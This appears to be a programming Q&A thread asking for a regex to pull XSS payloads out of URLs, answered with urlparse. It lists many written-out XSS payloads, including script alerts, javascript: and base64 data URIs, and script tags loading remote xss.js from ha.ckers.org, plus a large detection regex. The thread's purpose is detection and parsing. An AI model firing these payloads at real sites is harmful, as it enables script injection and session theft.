# Regex to match all XSS payloads in the following list

Tags: python, regex, python-2.7, payload

I need a regex that will match all XSS payloads in the following list (I am not trying to filter the XSS requests and save the URL's as safe, I'm trying to pull the payload from the URL itself and save it to a variable for later use):

```
http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24&lt;
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24&lt
http://www.example.com/subcat.php?id=24&lt;
http://www.example.com/subcat.php?id=24&LT
http://www.example.com/subcat.php?id=24&LT;
http://www.example.com/subcat.php?id=24&#60
http://www.example.com/subcat.php?id=24&#060
http://www.example.com/subcat.php?id=24&#0060
http://www.example.com/subcat.php?id=24&#00060
http://www.example.com/subcat.php?id=24&#000060
http://www.example.com/subcat.php?id=24&#0000060
http://www.example.com/subcat.php?id=24&lt;
http://www.example.com/subcat.php?id=24&#x3c
http://www.example.com/subcat.php?id=24&#x03c
http://www.example.com/subcat.php?id=24&#x003c
http://www.example.com/subcat.php?id=24&#x0003c
http://www.example.com/subcat.php?id=24&#x00003c
http://www.example.com/subcat.php?id=24&#x000003c
http://www.example.com/subcat.php?id=24&#x3c;
http://www.example.com/subcat.php?id=24&#x03c;
http://www.example.com/subcat.php?id=24&#x003c;
http://www.example.com/subcat.php?id=24&#x0003c;
http://www.example.com/subcat.php?id=24&#x00003c;
http://www.example.com/subcat.php?id=24&#x000003c;
http://www.example.com/subcat.php?id=24&#X3c
http://www.example.com/subcat.php?id=24&#X03c
http://www.example.com/subcat.php?id=24&#X003c
http://www.example.com/subcat.php?id=24&#X0003c
http://www.example.com/subcat.php?id=24&#X00003c
http://www.example.com/subcat.php?id=24&#X000003c
http://www.example.com/subcat.php?id=24&#X3c;
http://www.example.com/subcat.php?id=24&#X03c;
http://www.example.com/subcat.php?id=24&#X003c;
http://www.example.com/subcat.php?id=24&#X0003c;
http://www.example.com/subcat.php?id=24&#X00003c;
http://www.example.com/subcat.php?id=24&#X000003c;
http://www.example.com/subcat.php?id=24&#x3C
http://www.example.com/subcat.php?id=24&#x03C
http://www.example.com/subcat.php?id=24&#x003C
http://www.example.com/subcat.php?id=24&#x0003C
http://www.example.com/subcat.php?id=24&#x00003C
http://www.example.com/subcat.php?id=24&#x000003C
http://www.example.com/subcat.php?id=24&#x3C;
http://www.example.com/subcat.php?id=24&#x03C;
http://www.example.com/subcat.php?id=24&#x003C;
http://www.example.com/subcat.php?id=24&#x0003C;
http://www.example.com/subcat.php?id=24&#x00003C;
http://www.example.com/subcat.php?id=24&#x000003C;
http://www.example.com/subcat.php?id=24&#X3C
http://www.example.com/subcat.php?id=24&#X03C
http://www.example.com/subcat.php?id=24&#X003C
http://www.example.com/subcat.php?id=24&#X0003C
http://www.example.com/subcat.php?id=24&#X00003C
http://www.example.com/subcat.php?id=24&#X000003C
http://www.example.com/subcat.php?id=24&#X3C;
http://www.example.com/subcat.php?id=24&#X03C;
http://www.example.com/subcat.php?id=24&#X003C;
http://www.example.com/subcat.php?id=24&#X0003C;
http://www.example.com/subcat.php?id=24&#X00003C;
http://www.example.com/subcat.php?id=24&#X000003C;
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)
```

I did managed to find one and edit it to match some, but not all:

```
<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=
```

For an example see [here](https://regex101.com/r/3H14qY/1), it will only match ones that have a `<script>` and some of them it will not do a full match on them. Does anybody have a better regex that will match only the XSS payload of the URL, or a better way to find the XSS payload? Thank you ahead of time.

Comment: Possible duplicate of [Python library for XSS filtering?](https://stackoverflow.com/questions/901369/python-library-for-xss-filtering)

Comment: @ctwheels thank you!

Comment: @ctwheels hey, appreciate it, but that does not answer my questuion. I'm not trying to filter the XSS, I'm trying to pull the payload from the URL and save it as a variable

Comment: I'm not sure regex is the best tool for the job. I'm not familiar with tools to parse such things, but someone, I'm sure, has already created *something* to perform similar tasks.

Comment: @ctwheels I figured something out and decided to use `urlparse` in place of the parsing

Answer (score 0):

Figured out a way to do this simply with a built-in library:

```
import urlparse

def find_xss_script(url, query=4):
    data = urlparse.urlparse(url)
    return data[query]
```

Will return something like: `id=24&#x000003c;`